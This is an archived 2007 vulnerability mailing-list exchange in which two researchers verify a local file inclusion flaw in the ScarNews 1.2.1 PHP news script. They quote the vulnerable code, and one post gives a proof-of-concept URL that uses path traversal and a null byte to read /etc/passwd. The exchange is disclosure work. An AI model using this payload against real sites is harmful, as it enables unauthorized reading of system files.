[VIM] ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit

str0ke str0ke at milw0rm.com
Mon Apr 9 16:00:39 UTC 2007 

Hey George,

Wish I would of had a backup for you.  The die() wasn't there before
and was modified.

  if(!defined("SN_INCLUDE")) {
          die("ACCESS FORBIDDEN");
  }

Its still vulnerable with or without register globals but we need
magic quotes = off.

scarnews.php
#######################

if(!$sn_db_handel && file_exists($sn_admin_dir."scarnews.inc.php")) {
     include($sn_admin_dir."scarnews.inc.php");


scarnews.inc.php
##################################
	
$sn_get_post = $_REQUEST;
foreach ($sn_get_post as $sn_key => $sn_value) {
    if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
}

$PHP_SELF = $_SERVER['PHP_SELF'];

######################################################################
###                                                                ###
###  Einbinden der Konfigurationen                                 ###
if(file_exists($sn_admin_dir."admin/config.inc.php")) {            ###
     include($sn_admin_dir."admin/config.inc.php");                ###
} else {


http://site.com/scarnews.inc.php?sn_admindir=../../../etc/passwd%00

/str0ke

On 4/9/07, George A. Theall <theall at tenablesecurity.com> wrote:
> Milw0rm 3687 is for a local file include in a German news script. If I
> read the PoC correctly, the flaw lies with the 'sn_admin_dir' parameter
> of the 'scarnews.inc.php' script. The vendor seems to have just patched
> several files; eg,
>
>    http://www.scar4u.de/news/index.php?sn_show_news=117
>
> yet the version remains pegged at 1.2.1. Anyone have a copy of the
> affected file before the changes? The version I just grabbed has this at
> the top:
>
>    if(!defined("SN_INCLUDE")) {
>            die("ACCESS FORBIDDEN");
>    }
>
> preventing it from being called directly and which I suspect is what's
> just been changed. Later in the file, we have global variable
> registration as long as the parameter starts with "sn_":
>
>    $sn_get_post = $_REQUEST;
>    foreach ($sn_get_post as $sn_key => $sn_value) {
>        if(ereg("^sn_",$sn_key)) { ${$sn_key} = $sn_value; }
>    }
>
> and then:
>
>    if(file_exists($sn_admin_dir."admin/config.inc.php")) {            ###
>         include($sn_admin_dir."admin/config.inc.php");                ###
>    } else {
>
> So, the issue is probably valid.
>
>
> George
> --
> theall at tenablesecurity.com
>

More information about the VIM mailing list